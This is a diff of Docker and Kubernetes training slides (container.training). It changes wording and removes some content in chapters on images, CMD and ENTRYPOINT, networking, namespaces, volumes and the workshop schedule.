<br/>
|
||||
API gateway that can interconnect applications on VMs, containers, and serverless.
|
||||
For more information about the ambassador pattern, including demos on Swarm and ECS:
|
||||
|
||||
* AWS re:invent 2015 [DVO317](https://www.youtube.com/watch?v=7CZFpHUPqXw)
|
||||
|
||||
* [SwarmWeek video about Swarm+Compose](https://youtube.com/watch?v=qbIvUvwa6As)
|
||||
|
||||
Some services meshes and related projects:
|
||||
|
||||
* [Istio](https://istio.io/)
|
||||
<br/>
|
||||
A popular service mesh.
|
||||
|
||||
* [Linkerd](https://linkerd.io/)
|
||||
<br/>
|
||||
Another popular service mesh.
|
||||
|
||||
---
|
||||
|
||||
## Learning more about service meshes
|
||||
|
||||
A few blog posts about service meshes:
|
||||
|
||||
* [Containers, microservices, and service meshes](http://jpetazzo.github.io/2019/05/17/containers-microservices-service-meshes/)
|
||||
<br/>
|
||||
Provides historical context: how did we do before service meshes were invented?
|
||||
|
||||
* [Do I Need a Service Mesh?](https://www.nginx.com/blog/do-i-need-a-service-mesh/)
|
||||
<br/>
|
||||
Explains the purpose of service meshes. Illustrates some NGINX features.
|
||||
|
||||
* [Do you need a service mesh?](https://www.oreilly.com/ideas/do-you-need-a-service-mesh)
|
||||
<br/>
|
||||
Includes high-level overview and definitions.
|
||||
|
||||
* [What is Service Mesh and Why Do We Need It?](https://containerjournal.com/2018/12/12/what-is-service-mesh-and-why-do-we-need-it/)
|
||||
<br/>
|
||||
Includes a step-by-step demo of Linkerd.
|
||||
|
||||
And a video:
|
||||
|
||||
* [What is a Service Mesh, and Do I Need One When Developing Microservices?](https://www.datawire.io/envoyproxy/service-mesh/)
|
||||
* [Gloo](https://gloo.solo.io/)
|
||||
|
||||
@@ -98,13 +98,13 @@ COPY prometheus.conf /etc
|
||||
|
||||
* Allows arbitrary customization and complex configuration files.
|
||||
|
||||
* Requires writing a configuration file. (Obviously!)
|
||||
* Requires to write a configuration file. (Obviously!)
|
||||
|
||||
* Requires building an image to start the service.
|
||||
* Requires to build an image to start the service.
|
||||
|
||||
* Requires rebuilding the image to reconfigure the service.
|
||||
* Requires to rebuild the image to reconfigure the service.
|
||||
|
||||
* Requires rebuilding the image to upgrade the service.
|
||||
* Requires to rebuild the image to upgrade the service.
|
||||
|
||||
* Configured images can be stored in registries.
|
||||
|
||||
@@ -132,11 +132,11 @@ docker run -v appconfig:/etc/appconfig myapp
|
||||
|
||||
* Allows arbitrary customization and complex configuration files.
|
||||
|
||||
* Requires creating a volume for each different configuration.
|
||||
* Requires to create a volume for each different configuration.
|
||||
|
||||
* Services with identical configurations can use the same volume.
|
||||
|
||||
* Doesn't require building / rebuilding an image when upgrading / reconfiguring.
|
||||
* Doesn't require to build / rebuild an image when upgrading / reconfiguring.
|
||||
|
||||
* Configuration can be generated or edited through another container.
|
||||
|
||||
@@ -198,4 +198,4 @@ E.g.:
|
||||
|
||||
- read the secret on stdin when the service starts,
|
||||
|
||||
- pass the secret using an API endpoint.
|
||||
- pass the secret using an API endpoint.
|
||||
@@ -257,7 +257,7 @@ $ docker kill 068 57ad
|
||||
The `stop` and `kill` commands can take multiple container IDs.
|
||||
|
||||
Those containers will be terminated immediately (without
|
||||
the 10-second delay).
|
||||
the 10 seconds delay).
|
||||
|
||||
Let's check that our containers don't show up anymore:
|
||||
|
||||
|
||||
@@ -222,16 +222,16 @@ CMD ["hello world"]
|
||||
Let's build it:
|
||||
|
||||
```bash
|
||||
$ docker build -t myfiglet .
|
||||
$ docker build -t figlet .
|
||||
...
|
||||
Successfully built 6e0b6a048a07
|
||||
Successfully tagged myfiglet:latest
|
||||
Successfully tagged figlet:latest
|
||||
```
|
||||
|
||||
Run it without parameters:
|
||||
|
||||
```bash
|
||||
$ docker run myfiglet
|
||||
$ docker run figlet
|
||||
_ _ _ _
|
||||
| | | | | | | | |
|
||||
| | _ | | | | __ __ ,_ | | __|
|
||||
@@ -246,7 +246,7 @@ $ docker run myfiglet
|
||||
Now let's pass extra arguments to the image.
|
||||
|
||||
```bash
|
||||
$ docker run myfiglet hola mundo
|
||||
$ docker run figlet hola mundo
|
||||
_ _
|
||||
| | | | |
|
||||
| | __ | | __, _ _ _ _ _ __| __
|
||||
@@ -262,13 +262,13 @@ We overrode `CMD` but still used `ENTRYPOINT`.
|
||||
|
||||
What if we want to run a shell in our container?
|
||||
|
||||
We cannot just do `docker run myfiglet bash` because
|
||||
We cannot just do `docker run figlet bash` because
|
||||
that would just tell figlet to display the word "bash."
|
||||
|
||||
We use the `--entrypoint` parameter:
|
||||
|
||||
```bash
|
||||
$ docker run -it --entrypoint bash myfiglet
|
||||
$ docker run -it --entrypoint bash figlet
|
||||
root@6027e44e2955:/#
|
||||
```
|
||||
|
||||
|
||||
@@ -86,7 +86,7 @@ like Windows, macOS, Solaris, FreeBSD ...
|
||||
|
||||
* No notion of image (container filesystems have to be managed manually).
|
||||
|
||||
* Networking has to be set up manually.
|
||||
* Networking has to be setup manually.
|
||||
|
||||
---
|
||||
|
||||
@@ -112,7 +112,7 @@ like Windows, macOS, Solaris, FreeBSD ...
|
||||
|
||||
* Strong emphasis on security (through privilege separation).
|
||||
|
||||
* Networking has to be set up separately (e.g. through CNI plugins).
|
||||
* Networking has to be setup separately (e.g. through CNI plugins).
|
||||
|
||||
* Partial image management (pull, but no push).
|
||||
|
||||
@@ -152,7 +152,7 @@ We're not aware of anyone using it directly (i.e. outside of Kubernetes).
|
||||
|
||||
* Basic image support (tar archives and raw disk images).
|
||||
|
||||
* Network has to be set up manually.
|
||||
* Network has to be setup manually.
|
||||
|
||||
---
|
||||
|
||||
@@ -164,7 +164,7 @@ We're not aware of anyone using it directly (i.e. outside of Kubernetes).
|
||||
|
||||
* Run each container in a lightweight virtual machine.
|
||||
|
||||
* Requires running on bare metal *or* with nested virtualization.
|
||||
* Requires to run on bare metal *or* with nested virtualization.
|
||||
|
||||
---
|
||||
|
||||
|
||||
@@ -474,7 +474,7 @@ When creating a network, extra options can be provided.
|
||||
|
||||
* `--ip-range` (in CIDR notation) indicates the subnet to allocate from.
|
||||
|
||||
* `--aux-address` allows specifying a list of reserved addresses (which won't be allocated to containers).
|
||||
* `--aux-address` allows to specify a list of reserved addresses (which won't be allocated to containers).
|
||||
|
||||
---
|
||||
|
||||
@@ -528,9 +528,7 @@ Very short instructions:
|
||||
- `docker network create mynet --driver overlay`
|
||||
- `docker service create --network mynet myimage`
|
||||
|
||||
If you want to learn more about Swarm mode, you can check
|
||||
[this video](https://www.youtube.com/watch?v=EuzoEaE6Cqs)
|
||||
or [these slides](https://container.training/swarm-selfpaced.yml.html).
|
||||
See https://jpetazzo.github.io/container.training for all the deets about clustering!
|
||||
|
||||
---
|
||||
|
||||
@@ -556,7 +554,7 @@ General idea:
|
||||
|
||||
* So far, we have specified which network to use when starting the container.
|
||||
|
||||
* The Docker Engine also allows connecting and disconnecting while the container is running.
|
||||
* The Docker Engine also allows to connect and disconnect while the container runs.
|
||||
|
||||
* This feature is exposed through the Docker API, and through two Docker CLI commands:
|
||||
|
||||
|
||||
@@ -76,78 +76,6 @@ CMD ["python", "app.py"]
|
||||
|
||||
---
|
||||
|
||||
## Be careful with `chown`, `chmod`, `mv`
|
||||
|
||||
* Layers cannot store efficiently changes in permissions or ownership.
|
||||
|
||||
* Layers cannot represent efficiently when a file is moved either.
|
||||
|
||||
* As a result, operations like `chown`, `chown`, `mv` can be expensive.
|
||||
|
||||
* For instance, in the Dockerfile snippet below, each `RUN` line
|
||||
creates a layer with an entire copy of `some-file`.
|
||||
|
||||
```dockerfile
|
||||
COPY some-file .
|
||||
RUN chown www-data:www-data some-file
|
||||
RUN chmod 644 some-file
|
||||
RUN mv some-file /var/www
|
||||
```
|
||||
|
||||
* How can we avoid that?
|
||||
|
||||
---
|
||||
|
||||
## Put files on the right place
|
||||
|
||||
* Instead of using `mv`, directly put files at the right place.
|
||||
|
||||
* When extracting archives (tar, zip...), merge operations in a single layer.
|
||||
|
||||
Example:
|
||||
|
||||
```dockerfile
|
||||
...
|
||||
RUN wget http://.../foo.tar.gz \
|
||||
&& tar -zxf foo.tar.gz \
|
||||
&& mv foo/fooctl /usr/local/bin \
|
||||
&& rm -rf foo
|
||||
...
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Use `COPY --chown`
|
||||
|
||||
* The Dockerfile instruction `COPY` can take a `--chown` parameter.
|
||||
|
||||
Examples:
|
||||
|
||||
```dockerfile
|
||||
...
|
||||
COPY --chown=1000 some-file .
|
||||
COPY --chown=1000:1000 some-file .
|
||||
COPY --chown=www-data:www-data some-file .
|
||||
```
|
||||
|
||||
* The `--chown` flag can specify a user, or a user:group pair.
|
||||
|
||||
* The user and group can be specified as names or numbers.
|
||||
|
||||
* When using names, the names must exist in `/etc/passwd` or `/etc/group`.
|
||||
|
||||
*(In the container, not on the host!)*
|
||||
|
||||
---
|
||||
|
||||
## Set correct permissions locally
|
||||
|
||||
* Instead of using `chmod`, set the right file permissions locally.
|
||||
|
||||
* When files are copied with `COPY`, permissions are preserved.
|
||||
|
||||
---
|
||||
|
||||
## Embedding unit tests in the build process
|
||||
|
||||
```dockerfile
|
||||
|
||||
@@ -1,5 +0,0 @@
|
||||
# Exercise — writing a Compose file
|
||||
|
||||
Let's write a Compose file for the wordsmith app!
|
||||
|
||||
The code is at: https://github.com/jpetazzo/wordsmith
|
||||
@@ -1,9 +0,0 @@
|
||||
# Exercise — writing better Dockerfiles
|
||||
|
||||
Let's update our Dockerfiles to leverage multi-stage builds!
|
||||
|
||||
The code is at: https://github.com/jpetazzo/wordsmith
|
||||
|
||||
Use a different tag for these images, so that we can compare their sizes.
|
||||
|
||||
What's the size difference between single-stage and multi-stage builds?
|
||||
@@ -1,5 +0,0 @@
|
||||
# Exercise — writing Dockerfiles
|
||||
|
||||
Let's write Dockerfiles for an existing application!
|
||||
|
||||
The code is at: https://github.com/jpetazzo/wordsmith
|
||||
@@ -203,90 +203,4 @@ bash: figlet: command not found
|
||||
|
||||
* The basic Ubuntu image was used, and `figlet` is not here.
|
||||
|
||||
---
|
||||
|
||||
## Where's my container?
|
||||
|
||||
* Can we reuse that container that we took time to customize?
|
||||
|
||||
*We can, but that's not the default workflow with Docker.*
|
||||
|
||||
* What's the default workflow, then?
|
||||
|
||||
*Always start with a fresh container.*
|
||||
<br/>
|
||||
*If we need something installed in our container, build a custom image.*
|
||||
|
||||
* That seems complicated!
|
||||
|
||||
*We'll see that it's actually pretty easy!*
|
||||
|
||||
* And what's the point?
|
||||
|
||||
*This puts a strong emphasis on automation and repeatability. Let's see why ...*
|
||||
|
||||
---
|
||||
|
||||
## Pets vs. Cattle
|
||||
|
||||
* In the "pets vs. cattle" metaphor, there are two kinds of servers.
|
||||
|
||||
* Pets:
|
||||
|
||||
* have distinctive names and unique configurations
|
||||
|
||||
* when they have an outage, we do everything we can to fix them
|
||||
|
||||
* Cattle:
|
||||
|
||||
* have generic names (e.g. with numbers) and generic configuration
|
||||
|
||||
* configuration is enforced by configuration management, golden images ...
|
||||
|
||||
* when they have an outage, we can replace them immediately with a new server
|
||||
|
||||
* What's the connection with Docker and containers?
|
||||
|
||||
---
|
||||
|
||||
## Local development environments
|
||||
|
||||
* When we use local VMs (with e.g. VirtualBox or VMware), our workflow looks like this:
|
||||
|
||||
* create VM from base template (Ubuntu, CentOS...)
|
||||
|
||||
* install packages, set up environment
|
||||
|
||||
* work on project
|
||||
|
||||
* when done, shut down VM
|
||||
|
||||
* next time we need to work on project, restart VM as we left it
|
||||
|
||||
* if we need to tweak the environment, we do it live
|
||||
|
||||
* Over time, the VM configuration evolves, diverges.
|
||||
|
||||
* We don't have a clean, reliable, deterministic way to provision that environment.
|
||||
|
||||
---
|
||||
|
||||
## Local development with Docker
|
||||
|
||||
* With Docker, the workflow looks like this:
|
||||
|
||||
* create container image with our dev environment
|
||||
|
||||
* run container with that image
|
||||
|
||||
* work on project
|
||||
|
||||
* when done, shut down container
|
||||
|
||||
* next time we need to work on project, start a new container
|
||||
|
||||
* if we need to tweak the environment, we create a new image
|
||||
|
||||
* We have a clear definition of our environment, and can share it reliably with others.
|
||||
|
||||
* Let's see in the next chapters how to bake a custom image with `figlet`!
|
||||
* We will see in the next chapters how to bake a custom image with `figlet`.
|
||||
|
||||
@@ -70,9 +70,8 @@ class: pic
|
||||
|
||||
* An image is a read-only filesystem.
|
||||
|
||||
* A container is an encapsulated set of processes,
|
||||
|
||||
running in a read-write copy of that filesystem.
|
||||
* A container is an encapsulated set of processes running in a
|
||||
read-write copy of that filesystem.
|
||||
|
||||
* To optimize container boot time, *copy-on-write* is used
|
||||
instead of regular copy.
|
||||
@@ -178,11 +177,8 @@ Let's explain each of them.
|
||||
|
||||
## Root namespace
|
||||
|
||||
The root namespace is for official images.
|
||||
|
||||
They are gated by Docker Inc.
|
||||
|
||||
They are generally authored and maintained by third parties.
|
||||
The root namespace is for official images. They are put there by Docker Inc.,
|
||||
but they are generally authored and maintained by third parties.
|
||||
|
||||
Those images include:
|
||||
|
||||
@@ -192,7 +188,7 @@ Those images include:
|
||||
|
||||
* Ready-to-use components and services, like redis, postgresql...
|
||||
|
||||
* Over 150 at this point!
|
||||
* Over 130 at this point!
|
||||
|
||||
---
|
||||
|
||||
|
||||
@@ -156,7 +156,7 @@ Option 3:
|
||||
|
||||
* Use a *volume* to mount local files into the container
|
||||
* Make changes locally
|
||||
* Changes are reflected in the container
|
||||
* Changes are reflected into the container
|
||||
|
||||
---
|
||||
|
||||
@@ -176,7 +176,7 @@ $ docker run -d -v $(pwd):/src -P namer
|
||||
|
||||
* `namer` is the name of the image we will run.
|
||||
|
||||
* We don't specify a command to run because it is already set in the Dockerfile via `CMD`.
|
||||
* We don't specify a command to run because it is already set in the Dockerfile.
|
||||
|
||||
Note: on Windows, replace `$(pwd)` with `%cd%` (or `${pwd}` if you use PowerShell).
|
||||
|
||||
@@ -192,7 +192,7 @@ The flag structure is:
|
||||
[host-path]:[container-path]:[rw|ro]
|
||||
```
|
||||
|
||||
* `[host-path]` and `[container-path]` are created if they don't exist.
|
||||
* If `[host-path]` or `[container-path]` doesn't exist it is created.
|
||||
|
||||
* You can control the write status of the volume with the `ro` and
|
||||
`rw` options.
|
||||
@@ -255,13 +255,13 @@ color: red;
|
||||
|
||||
* Volumes are *not* copying or synchronizing files between the host and the container.
|
||||
|
||||
* Volumes are *bind mounts*: a kernel mechanism associating one path with another.
|
||||
* Volumes are *bind mounts*: a kernel mechanism associating a path to another.
|
||||
|
||||
* Bind mounts are *kind of* similar to symbolic links, but at a very different level.
|
||||
|
||||
* Changes made on the host or on the container will be visible on the other side.
|
||||
|
||||
(Under the hood, it's the same file anyway.)
|
||||
(Since under the hood, it's the same file on both anyway.)
|
||||
|
||||
---
|
||||
|
||||
@@ -273,7 +273,7 @@ by Chad Fowler, where he explains the concept of immutable infrastructure.)*
|
||||
|
||||
--
|
||||
|
||||
* Let's majorly mess up our container.
|
||||
* Let's mess up majorly with our container.
|
||||
|
||||
(Remove files or whatever.)
|
||||
|
||||
@@ -319,7 +319,7 @@ and *canary deployments*.
|
||||
<br/>
|
||||
Use the `-v` flag to mount our source code inside the container.
|
||||
|
||||
3. Edit the source code outside the container, using familiar tools.
|
||||
3. Edit the source code outside the containers, using regular tools.
|
||||
<br/>
|
||||
(vim, emacs, textmate...)
|
||||
|
||||
|
||||
@@ -86,13 +86,13 @@ class: extra-details, deep-dive
|
||||
|
||||
- the `unshare()` system call.
|
||||
|
||||
- The Linux tool `unshare` allows doing that from a shell.
|
||||
- The Linux tool `unshare` allows to do that from a shell.
|
||||
|
||||
- A new process can re-use none / all / some of the namespaces of its parent.
|
||||
|
||||
- It is possible to "enter" a namespace with the `setns()` system call.
|
||||
|
||||
- The Linux tool `nsenter` allows doing that from a shell.
|
||||
- The Linux tool `nsenter` allows to do that from a shell.
|
||||
|
||||
---
|
||||
|
||||
@@ -138,11 +138,11 @@ class: extra-details, deep-dive
|
||||
|
||||
- gethostname / sethostname
|
||||
|
||||
- Allows setting a custom hostname for a container.
|
||||
- Allows to set a custom hostname for a container.
|
||||
|
||||
- That's (mostly) it!
|
||||
|
||||
- Also allows setting the NIS domain.
|
||||
- Also allows to set the NIS domain.
|
||||
|
||||
(If you don't know what a NIS domain is, you don't have to worry about it!)
|
||||
|
||||
@@ -392,13 +392,13 @@ class: extra-details
|
||||
|
||||
- Processes can have their own root fs (à la chroot).
|
||||
|
||||
- Processes can also have "private" mounts. This allows:
|
||||
- Processes can also have "private" mounts. This allows to:
|
||||
|
||||
- isolating `/tmp` (per user, per service...)
|
||||
- isolate `/tmp` (per user, per service...)
|
||||
|
||||
- masking `/proc`, `/sys` (for processes that don't need them)
|
||||
- mask `/proc`, `/sys` (for processes that don't need them)
|
||||
|
||||
- mounting remote filesystems or sensitive data,
|
||||
- mount remote filesystems or sensitive data,
|
||||
<br/>but make it visible only for allowed processes
|
||||
|
||||
- Mounts can be totally private, or shared.
|
||||
@@ -570,7 +570,7 @@ Check `man 2 unshare` and `man pid_namespaces` if you want more details.
|
||||
|
||||
## User namespace
|
||||
|
||||
- Allows mapping UID/GID; e.g.:
|
||||
- Allows to map UID/GID; e.g.:
|
||||
|
||||
- UID 0→1999 in container C1 is mapped to UID 10000→11999 on host
|
||||
- UID 0→1999 in container C2 is mapped to UID 12000→13999 on host
|
||||
@@ -947,7 +947,7 @@ Killed
|
||||
|
||||
(i.e., "this group of process used X seconds of CPU0 and Y seconds of CPU1".)
|
||||
|
||||
- Allows setting relative weights used by the scheduler.
|
||||
- Allows to set relative weights used by the scheduler.
|
||||
|
||||
---
|
||||
|
||||
@@ -1101,9 +1101,9 @@ See `man capabilities` for the full list and details.
|
||||
|
||||
- Original seccomp only allows `read()`, `write()`, `exit()`, `sigreturn()`.
|
||||
|
||||
- The seccomp-bpf extension allows specifying custom filters with BPF rules.
|
||||
- The seccomp-bpf extension allows to specify custom filters with BPF rules.
|
||||
|
||||
- This allows filtering by syscall, and by parameter.
|
||||
- This allows to filter by syscall, and by parameter.
|
||||
|
||||
- BPF code can perform arbitrarily complex checks, quickly, and safely.
|
||||
|
||||
|
||||
@@ -6,6 +6,8 @@ In this chapter, we will:
|
||||
|
||||
* Present (from a high-level perspective) some orchestrators.
|
||||
|
||||
* Show one orchestrator (Kubernetes) in action.
|
||||
|
||||
---
|
||||
|
||||
class: pic
|
||||
@@ -119,7 +121,7 @@ Now, how are things for our IAAS provider?
|
||||
- Solution: *migrate* VMs and shutdown empty servers
|
||||
|
||||
(e.g. combine two hypervisors with 40% load into 80%+0%,
|
||||
<br/>and shut down the one at 0%)
|
||||
<br/>and shutdown the one at 0%)
|
||||
|
||||
---
|
||||
|
||||
@@ -127,7 +129,7 @@ Now, how are things for our IAAS provider?
|
||||
|
||||
How do we implement this?
|
||||
|
||||
- Shut down empty hosts (but keep some spare capacity)
|
||||
- Shutdown empty hosts (but keep some spare capacity)
|
||||
|
||||
- Start hosts again when capacity gets low
|
||||
|
||||
@@ -175,7 +177,7 @@ In practice, these goals often conflict.
|
||||
|
||||
- 16 GB RAM, 8 cores, 1 TB disk
|
||||
|
||||
- Each week, your team requests:
|
||||
- Each week, your team asks:
|
||||
|
||||
- one VM with X RAM, Y CPU, Z disk
|
||||
|
||||
|
||||
@@ -72,7 +72,7 @@
|
||||
|
||||
- For memory usage, the mechanism is part of the *cgroup* subsystem.
|
||||
|
||||
- This subsystem allows limiting the memory for a process or a group of processes.
|
||||
- This subsystem allows to limit the memory for a process or a group of processes.
|
||||
|
||||
- A container engine leverages these mechanisms to limit memory for a container.
|
||||
|
||||
|
||||
@@ -45,13 +45,13 @@ individual Docker VM.*
|
||||
|
||||
- The Docker Engine is a daemon (a service running in the background).
|
||||
|
||||
- This daemon manages containers, the same way that a hypervisor manages VMs.
|
||||
- This daemon manages containers, the same way that an hypervisor manages VMs.
|
||||
|
||||
- We interact with the Docker Engine by using the Docker CLI.
|
||||
|
||||
- The Docker CLI and the Docker Engine communicate through an API.
|
||||
|
||||
- There are many other programs and client libraries which use that API.
|
||||
- There are many other programs, and many client libraries, to use that API.
|
||||
|
||||
---
|
||||
|
||||
|
||||
@@ -33,13 +33,13 @@ Docker volumes can be used to achieve many things, including:
|
||||
|
||||
* Sharing a *single file* between the host and a container.
|
||||
|
||||
* Using remote storage and custom storage with *volume drivers*.
|
||||
* Using remote storage and custom storage with "volume drivers".
|
||||
|
||||
---
|
||||
|
||||
## Volumes are special directories in a container
|
||||
|
||||
Volumes can be declared in two different ways:
|
||||
Volumes can be declared in two different ways.
|
||||
|
||||
* Within a `Dockerfile`, with a `VOLUME` instruction.
|
||||
|
||||
@@ -163,7 +163,7 @@ Volumes are not anchored to a specific path.
|
||||
|
||||
* Volumes are used with the `-v` option.
|
||||
|
||||
* When a host path does not contain a `/`, it is considered a volume name.
|
||||
* When a host path does not contain a /, it is considered to be a volume name.
|
||||
|
||||
Let's start a web server using the two previous volumes.
|
||||
|
||||
@@ -189,7 +189,7 @@ $ curl localhost:1234
|
||||
|
||||
* In this example, we will run a text editor in the other container.
|
||||
|
||||
(But this could be an FTP server, a WebDAV server, a Git receiver...)
|
||||
(But this could be a FTP server, a WebDAV server, a Git receiver...)
|
||||
|
||||
Let's start another container using the `webapps` volume.
|
||||
|
||||
|
||||
|
Before Width: | Height: | Size: 82 KiB |
|
Before Width: | Height: | Size: 81 KiB |
|
Before Width: | Height: | Size: 82 KiB |
|
Before Width: | Height: | Size: 82 KiB |
|
Before Width: | Height: | Size: 84 KiB |
|
Before Width: | Height: | Size: 82 KiB |
|
Before Width: | Height: | Size: 82 KiB |
|
Before Width: | Height: | Size: 82 KiB |
|
Before Width: | Height: | Size: 82 KiB |
|
Before Width: | Height: | Size: 82 KiB |
|
Before Width: | Height: | Size: 82 KiB |
|
Before Width: | Height: | Size: 82 KiB |
|
Before Width: | Height: | Size: 82 KiB |
|
Before Width: | Height: | Size: 83 KiB |
|
Before Width: | Height: | Size: 82 KiB |
|
Before Width: | Height: | Size: 82 KiB |
|
Before Width: | Height: | Size: 81 KiB |
|
Before Width: | Height: | Size: 81 KiB |
|
Before Width: | Height: | Size: 81 KiB |
@@ -1,54 +1,3 @@
|
||||
- date: [2019-11-04, 2019-11-05]
|
||||
country: de
|
||||
city: Berlin
|
||||
event: Velocity
|
||||
speaker: jpetazzo
|
||||
title: Deploying and scaling applications with Kubernetes
|
||||
attend: https://conferences.oreilly.com/velocity/vl-eu/public/schedule/detail/79109
|
||||
|
||||
- date: 2019-11-13
|
||||
country: fr
|
||||
city: Marseille
|
||||
event: DevopsDDay
|
||||
speaker: jpetazzo
|
||||
title: Déployer ses applications avec Kubernetes (in French)
|
||||
lang: fr
|
||||
attend: http://2019.devops-dday.com/Workshop.html
|
||||
|
||||
- date: [2019-09-24, 2019-09-25]
|
||||
country: fr
|
||||
city: Paris
|
||||
event: ENIX SAS
|
||||
speaker: jpetazzo
|
||||
title: Déployer ses applications avec Kubernetes (in French)
|
||||
lang: fr
|
||||
attend: https://enix.io/fr/services/formation/deployer-ses-applications-avec-kubernetes/
|
||||
|
||||
- date: 2019-07-16
|
||||
country: us
|
||||
city: Portland, OR
|
||||
event: OSCON
|
||||
speaker: bridgetkromhout
|
||||
title: "Kubernetes 201: Production tooling"
|
||||
attend: https://conferences.oreilly.com/oscon/oscon-or/public/schedule/detail/76390
|
||||
|
||||
- date: 2019-06-17
|
||||
country: ca
|
||||
city: Montréal
|
||||
event: Zenika
|
||||
speaker: jpetazzo
|
||||
title: Getting Started With Kubernetes
|
||||
attend: https://www.eventbrite.com/e/getting-started-with-kubernetes-1-day-en-tickets-61658444066
|
||||
|
||||
- date: [2019-06-10, 2019-06-11]
|
||||
city: San Jose, CA
|
||||
country: us
|
||||
event: Velocity
|
||||
title: Kubernetes for administrators and operators
|
||||
speaker: jpetazzo
|
||||
attend: https://conferences.oreilly.com/velocity/vl-ca/public/schedule/detail/75313
|
||||
slides: https://kadm-2019-06.container.training/
|
||||
|
||||
- date: 2019-05-01
|
||||
country: us
|
||||
city: Cleveland, OH
|
||||
@@ -56,8 +5,6 @@
|
||||
speaker: jpetazzo, s0ulshake
|
||||
title: Getting started with Kubernetes and container orchestration
|
||||
attend: https://us.pycon.org/2019/schedule/presentation/74/
|
||||
slides: https://pycon2019.container.training/
|
||||
video: https://www.youtube.com/watch?v=J08MrW2NC1Y
|
||||
|
||||
- date: 2019-04-28
|
||||
country: us
|
||||
@@ -75,7 +22,6 @@
|
||||
speaker: jpetazzo
|
||||
title: Opérer et administrer Kubernetes
|
||||
attend: https://enix.io/fr/services/formation/operer-et-administrer-kubernetes/
|
||||
slides: https://kadm-2019-04.container.training/
|
||||
|
||||
- date: [2019-04-23, 2019-04-24]
|
||||
country: fr
|
||||
@@ -85,7 +31,7 @@
|
||||
title: Déployer ses applications avec Kubernetes (in French)
|
||||
lang: fr
|
||||
attend: https://enix.io/fr/services/formation/deployer-ses-applications-avec-kubernetes/
|
||||
slides: https://kube-2019-04.container.training/
|
||||
slides: https://kube-2019-04.container.training
|
||||
|
||||
- date: [2019-04-15, 2019-04-16]
|
||||
country: fr
|
||||
|
||||
@@ -30,11 +30,27 @@ chapters:
|
||||
- containers/Building_Images_With_Dockerfiles.md
|
||||
- containers/Cmd_And_Entrypoint.md
|
||||
- - containers/Copying_Files_During_Build.md
|
||||
- containers/Exercise_Dockerfile_Basic.md
|
||||
- |
|
||||
# Exercise — writing Dockerfiles
|
||||
|
||||
Let's write Dockerfiles for an existing application!
|
||||
|
||||
The code is at: https://github.com/jpetazzo/wordsmith
|
||||
|
||||
- containers/Multi_Stage_Builds.md
|
||||
- containers/Publishing_To_Docker_Hub.md
|
||||
- containers/Dockerfile_Tips.md
|
||||
- containers/Exercise_Dockerfile_Advanced.md
|
||||
- |
|
||||
# Exercise — writing better Dockerfiles
|
||||
|
||||
Let's update our Dockerfiles to leverage multi-stage builds!
|
||||
|
||||
The code is at: https://github.com/jpetazzo/wordsmith
|
||||
|
||||
Use a different tag for these images, so that we can compare their sizes.
|
||||
|
||||
What's the size difference between single-stage and multi-stage builds?
|
||||
|
||||
- - containers/Naming_And_Inspecting.md
|
||||
- containers/Labels.md
|
||||
- containers/Getting_Inside.md
|
||||
@@ -48,7 +64,13 @@ chapters:
|
||||
- containers/Windows_Containers.md
|
||||
- containers/Working_With_Volumes.md
|
||||
- containers/Compose_For_Dev_Stacks.md
|
||||
- containers/Exercise_Composefile.md
|
||||
- |
|
||||
# Exercise — writing a Compose file
|
||||
|
||||
Let's write a Compose file for the wordsmith app!
|
||||
|
||||
The code is at: https://github.com/jpetazzo/wordsmith
|
||||
|
||||
- - containers/Docker_Machine.md
|
||||
- containers/Advanced_Dockerfiles.md
|
||||
- containers/Application_Configuration.md
|
||||
|
||||
@@ -30,11 +30,9 @@ chapters:
|
||||
- containers/Building_Images_With_Dockerfiles.md
|
||||
- containers/Cmd_And_Entrypoint.md
|
||||
- containers/Copying_Files_During_Build.md
|
||||
- containers/Exercise_Dockerfile_Basic.md
|
||||
- - containers/Multi_Stage_Builds.md
|
||||
- containers/Publishing_To_Docker_Hub.md
|
||||
- containers/Dockerfile_Tips.md
|
||||
- containers/Exercise_Dockerfile_Advanced.md
|
||||
- - containers/Naming_And_Inspecting.md
|
||||
- containers/Labels.md
|
||||
- containers/Getting_Inside.md
|
||||
@@ -47,7 +45,6 @@ chapters:
|
||||
- containers/Windows_Containers.md
|
||||
- containers/Working_With_Volumes.md
|
||||
- containers/Compose_For_Dev_Stacks.md
|
||||
- containers/Exercise_Composefile.md
|
||||
- containers/Docker_Machine.md
|
||||
- - containers/Advanced_Dockerfiles.md
|
||||
- containers/Application_Configuration.md
|
||||
|
||||
@@ -1,38 +0,0 @@
|
||||
title: |
|
||||
Kubernetes 201
|
||||
Production tooling
|
||||
|
||||
#chat: "[Slack](https://dockercommunity.slack.com/messages/C7GKACWDV)"
|
||||
chat: "[Gitter](https://gitter.im/k8s-workshops/oscon2019)"
|
||||
#chat: "In person!"
|
||||
|
||||
gitrepo: github.com/jpetazzo/container.training
|
||||
|
||||
slides: https://container.training/
|
||||
|
||||
exclude:
|
||||
- self-paced
|
||||
- static-pods-exercise
|
||||
|
||||
chapters:
|
||||
- shared/title.md
|
||||
- logistics-bridget.md
|
||||
- k8s/intro.md
|
||||
- shared/about-slides.md
|
||||
- shared/toc.md
|
||||
- - k8s/prereqs-k8s201.md
|
||||
- k8s/localkubeconfig-k8s201.md
|
||||
- k8s/architecture-k8s201.md
|
||||
- - k8s/healthchecks.md
|
||||
- k8s/kubercoins-k8s201.md
|
||||
- k8s/authn-authz-k8s201.md
|
||||
- - k8s/resource-limits-k8s201.md
|
||||
- k8s/metrics-server.md
|
||||
- - k8s/cluster-sizing-k8s201.md
|
||||
- k8s/horizontal-pod-autoscaler.md
|
||||
- k8s/extending-api.md
|
||||
- k8s/helm.md
|
||||
- - k8s/lastwords-admin.md
|
||||
- k8s/links-bridget.md
|
||||
- shared/thankyou.md
|
||||
- k8s/operators.md
|
||||
@@ -1,390 +0,0 @@
|
||||
# Kubernetes architecture
|
||||
|
||||
We can arbitrarily split Kubernetes in two parts:
|
||||
|
||||
- the *nodes*, a set of machines that run our containerized workloads;
|
||||
|
||||
- the *control plane*, a set of processes implementing the Kubernetes APIs.
|
||||
|
||||
Kubernetes also relies on underlying infrastructure:
|
||||
|
||||
- servers, network connectivity (obviously!),
|
||||
|
||||
- optional components like storage systems, load balancers ...
|
||||
|
||||
---
|
||||
|
||||
## Control plane location
|
||||
|
||||
The control plane can run:
|
||||
|
||||
- in containers, on the same nodes that run other application workloads
|
||||
|
||||
(example: Minikube; 1 node runs everything)
|
||||
|
||||
- on a dedicated node
|
||||
|
||||
(example: a cluster installed with kubeadm)
|
